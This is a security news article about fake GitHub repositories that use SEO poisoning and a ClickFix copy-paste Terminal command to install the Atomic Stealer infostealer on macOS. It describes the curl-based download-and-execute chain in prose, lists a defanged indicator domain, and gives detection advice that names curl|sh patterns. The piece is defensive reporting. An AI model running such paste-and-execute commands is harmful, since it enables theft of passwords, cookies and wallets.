Fake GitHub Repositories Push Atomic Stealer (AMOS) to macOS Users via SEO Poisoning

CyberSecureFox 🦊

Threat actors are abusing search engine optimization (SEO) to seed fake GitHub repositories that impersonate well-known macOS software and redirect victims to installers for Atomic Stealer (AMOS). LastPass reports that the scheme specifically targeted macOS users and relied on GitHub’s reputation and high search rankings to bypass user skepticism.

SEO-poisoning on GitHub: how macOS users are funneled to malware

Analysts identified two repositories published on 16 September 2025 by the account modhopmduck476 that posed as official LastPass projects. Each linked to a supposed “LastPass for MacBook” download, ultimately sending users to the same trap page. Although those repos were removed, the technique remains active and repeatable.

“ClickFix” social engineering: copy–paste to compromise

The GitHub links led to a landing page that promoted a “quick install” by copying a single command into Terminal—an example of the ClickFix pattern, where a promised simple fix conceals a malicious action. The pasted command executed a curl request to an encoded URL, saved an “Update” payload to a temporary directory, and kicked off the AMOS installation. Because the user initiates the command themselves, this approach often sidesteps expectations about prompts and can evade casual scrutiny.

Campaign scope and brand impersonation beyond LastPass

Research indicates the activity has run since at least July and is not limited to LastPass branding. Other impersonated software and services include 1Password, Dropbox, Confluence, Robinhood, Fidelity, Notion, Gemini, Audacity, Adobe After Effects, Thunderbird, and SentinelOne. Multiple accounts followed a similar naming pattern (brand + macOS/Mac), complicating manual moderation and enabling rapid re-seeding after takedowns.

Atomic Stealer (AMOS): capabilities and why it matters

AMOS is a commercial macOS infostealer sold in underground markets since 2023 and widely tracked by security vendors (e.g., Malwarebytes, SentinelOne, Jamf). It targets browser data (cookies, autofill, saved passwords), cryptocurrency wallets, and can attempt to access Keychain items. Recent reporting from multiple research teams notes the addition of a backdoor component, enhancing persistence and post-compromise activity. In the observed chain, the domain macprograms-pro[.]com acted as an intermediate step. Repeated use of external redirects and look‑alike “install” pages with terminal instructions are reliable TTP indicators.

Risks for individuals and organizations

The immediate risk is credential compromise leading to account takeover across email, cloud services, finance, and corporate resources. For macOS specifically, the copy–paste Terminal flow can appear “official” and may proceed with fewer visible warnings than a typical application download, increasing the likelihood of user error and subsequent lateral movement in enterprise environments.

Mitigations and detection guidance

Use trusted distribution channels only. Prefer vendor domains and the Mac App Store. Treat newly created GitHub repositories with no commit history, zero stars, and marketing-heavy descriptions as high risk.

Verify project ownership. Look for GitHub organization verification, cross-links from the vendor’s official website, and Apple notarization and developer signing on installers. Gatekeeper should block unnotarized binaries; investigate any prompts that ask to bypass protections.

Avoid blind Terminal execution. Any “one-line fix” is a red flag. Administrators should restrict execution of untrusted scripts, block curl|sh patterns, and enforce least privilege. Deploy and tune macOS EDR to flag suspicious Terminal-driven downloads, base64/URL decoding, and execution from temporary directories.

Counter SEO-poisoning. Implement secure DNS and domain age filtering, block known-bad and one-day domains, and train users to validate URLs and downloads against official sources before installation.

Hunt for indicators and behaviors. Monitor for connections to macprograms-pro[.]com, anomalous curl usage, persistence artifacts, and unusual access to browser credential stores and Keychain. Consider adding content controls that warn on copy–paste of commands from the web into Terminal.

Attackers will continue to exploit trust in GitHub and search results to distribute macOS malware. Strengthen your software acquisition discipline, require provable authenticity for installers, and scrutinize any Terminal instructions that promise “quick fixes.” The most effective defense combines user education, strict source verification, and behavioral detections tuned to terminal-driven download-and-execute chains common to AMOS and similar threats.

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.